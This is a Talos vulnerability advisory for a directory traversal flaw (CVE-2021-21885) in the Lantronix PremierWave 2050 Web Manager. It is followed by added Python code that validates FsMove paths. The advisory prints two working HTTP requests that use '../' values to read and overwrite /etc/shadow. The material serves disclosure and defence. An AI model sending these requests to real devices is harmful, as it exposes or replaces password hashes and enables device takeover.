Lantronix PremierWave 2050 Web Manager FsMove directory traversal vulnerability
2021-11-15T00:00:00
ID: TALOS-2021-1329 (CVE-2021-21885)
Type: talos
Reporter: Talos Intelligence
Modified: 2021-11-15T00:00:00
Description
Summary
A directory traversal vulnerability exists in the Web Manager FsMove functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially crafted HTTP request can lead to local file inclusion. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Tested Versions
Lantronix PremierWave 2050 8.9.0.0R4 (in QEMU)
Product URLs
https://www.lantronix.com/products/premierwave2050/
CVSSv3 Score
7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
Details
PremierWave 2050 is an embedded Wi-Fi Module manufactured by Lantronix.
The PremierWave 2050 Web Manager allows an authenticated and properly authorized user to move files within a subdirectory of the device’s filesystem rooted at /ltrx_user/. The system attempts to keep the user from interacting with files outside of /ltrx_user/ by sanitizing some, but not all, of the attacker-controlled HTTP POST parameters. This feature is only accessible to users with the filesystem privilege.
The attacker-controlled cwd and dst parameters can be altered to include path traversal sequences that are not sanitized before the final file paths are composed. This allows the attacker to move arbitrary files into arbitrary locations, including the /ltrx_user/ directory, where they can then be read by any authenticated user regardless of permission.
The below request will move /etc/shadow into /ltrx_user/shadow.
POST / HTTP/1.1
Host: [IP]:[PORT]
Content-Length: 79
Authorization: Basic YnJvd25pZTpwb2ludHM=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

ajax=FsMove&src=shadow&dst=../ltrx_user/shadow&submit=Move&cwd=/../etc/
Conversely, it is also possible to upload a file into /ltrx_user/ and then use this vulnerability to move the file into an arbitrary destination within the filesystem.
The below request will overwrite /etc/shadow with /ltrx_user/shadow.
POST / HTTP/1.1
Host: [IP]:[PORT]
Content-Length: 79
Authorization: Basic YnJvd25pZTpwb2ludHM=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

ajax=FsMove&src=../ltrx_user/shadow&dst=shadow&submit=Move&cwd=/../etc/
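The root cause above is that the handler composes cwd and src/dst into a path without checking where the result lands. The following is an added example, not Lantronix code: it models the flawed composition (an assumption: root + cwd + name, normalised by the OS) and shows a confined resolver that validates both endpoints of an FsMove body, so the two requests above are rejected while an ordinary move inside /ltrx_user/ is allowed.

```python
import posixpath
from urllib.parse import parse_qs

ROOT = "/ltrx_user"  # directory the Web Manager intends to confine file operations to


def compose_naive(cwd: str, name: str) -> str:
    """Model of the vulnerable composition (assumed: root + cwd + name).
    Neither cwd nor name is checked for '..' before the OS normalises it."""
    return posixpath.normpath(ROOT + "/" + cwd + "/" + name)


class PathTraversal(Exception):
    pass


def resolve_confined(cwd: str, name: str, root: str = ROOT) -> str:
    """Hardened composition: reject '..' segments and NUL bytes outright, then
    normalise and accept the result only if it still lies under root.
    (On a real filesystem also realpath() the result so symlinks cannot escape.)"""
    if "\x00" in cwd or "\x00" in name or not name:
        raise PathTraversal("empty or malformed path component")
    if any(seg == ".." for seg in (cwd + "/" + name).split("/")):
        raise PathTraversal("parent-directory traversal rejected")
    candidate = posixpath.normpath(posixpath.join(root, cwd.lstrip("/"), name))
    if candidate != root and not candidate.startswith(root + "/"):
        raise PathTraversal(f"{candidate!r} escapes {root!r}")
    return candidate


def check_fsmove(body: str) -> tuple[str, str]:
    """Parse an FsMove form body and validate BOTH src and dst against root."""
    params = {k: v[0] for k, v in parse_qs(body).items()}
    cwd = params.get("cwd", "")
    return (resolve_confined(cwd, params.get("src", "")),
            resolve_confined(cwd, params.get("dst", "")))


def fsmove_is_confined(body: str) -> bool:
    """True if the move stays inside ROOT; False if either endpoint escapes."""
    try:
        check_fsmove(body)
        return True
    except PathTraversal:
        return False


# Constructed inputs: the two request bodies from the advisory and a benign move.
BODY_READ = "ajax=FsMove&src=shadow&dst=../ltrx_user/shadow&submit=Move&cwd=/../etc/"
BODY_WRITE = "ajax=FsMove&src=../ltrx_user/shadow&dst=shadow&submit=Move&cwd=/../etc/"
BODY_OK = "ajax=FsMove&src=config.txt&dst=backup/config.txt&submit=Move&cwd=/"
```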
Timeline
2021-06-14 - Vendor Disclosure
2021-06-15 - Vendor acknowledged
2021-09-01 - Talos granted disclosure extension to 2021-10-15
2021-10-18 - Vendor requested release push to 2nd week of November. Talos confirmed final extension and disclosure date
2021-11-15 - Public Release